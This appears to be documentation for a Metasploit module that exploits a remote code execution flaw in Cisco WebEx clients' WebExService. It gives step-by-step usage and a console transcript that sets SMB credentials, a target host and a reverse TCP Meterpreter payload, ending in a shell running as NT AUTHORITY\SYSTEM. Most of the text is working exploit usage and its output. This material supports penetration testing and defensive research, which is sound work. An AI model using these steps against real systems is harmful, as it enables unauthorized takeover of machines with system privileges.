## Description This module exploits a remote code execution vulnerability in Cisco's WebEx client software for versions < v33.6.0.655. Vulnerable WebEx clients come with the `WebExService` that can execute arbitrary commands with System privileges. Due to insufficient checks on permissions, a local or domain user can start the `WebExService` through a remote connection and execute code. ## Vulnerable Application Cisco WebEx software v33.3.8.7 and below ## Verification Steps 1. Install the application 2. Start msfconsole 3. Do: ```use exploit/windows/smb/webexec``` 4. Do: ```set RHOSTS ``` 5. Do: ```set SMBUser ``` 6. Do: ```set SMBPass ``` 7. Do: ```run``` 8. You should get a shell. ## Scenarios ### Tested on Cisco WebEx v33.3.8.7 on Windows 7 x64 and x86 ``` msf5 > use exploit/windows/smb/webexec msf5 exploit(windows/smb/webexec) > set smbuser a_user smbuser => a_user msf5 exploit(windows/smb/webexec) > set smbpass password smbpass => password msf5 exploit(windows/smb/webexec) > set rhosts 192.168.37.136 rhosts => 192.168.37.136 msf5 exploit(windows/smb/webexec) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(windows/smb/webexec) > set lhost 192.168.37.1 lhost => 192.168.37.1 msf5 exploit(windows/smb/webexec) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] 192.168.37.136:445 - Connecting to the server... [*] 192.168.37.136:445 - Authenticating to 192.168.37.136:445 as user 'a_user'... [*] 192.168.37.136:445 - Command Stager progress - 0.96% done (999/104435 bytes) [*] 192.168.37.136:445 - Command Stager progress - 1.91% done (1998/104435 bytes) ... [*] 192.168.37.136:445 - Command Stager progress - 99.47% done (103880/104435 bytes) [*] 192.168.37.136:445 - Command Stager progress - 100.00% done (104435/104435 bytes) [*] Sending stage (179779 bytes) to 192.168.37.136 [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.136:49158) at 2018-10-24 09:10:46 -0500 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > ```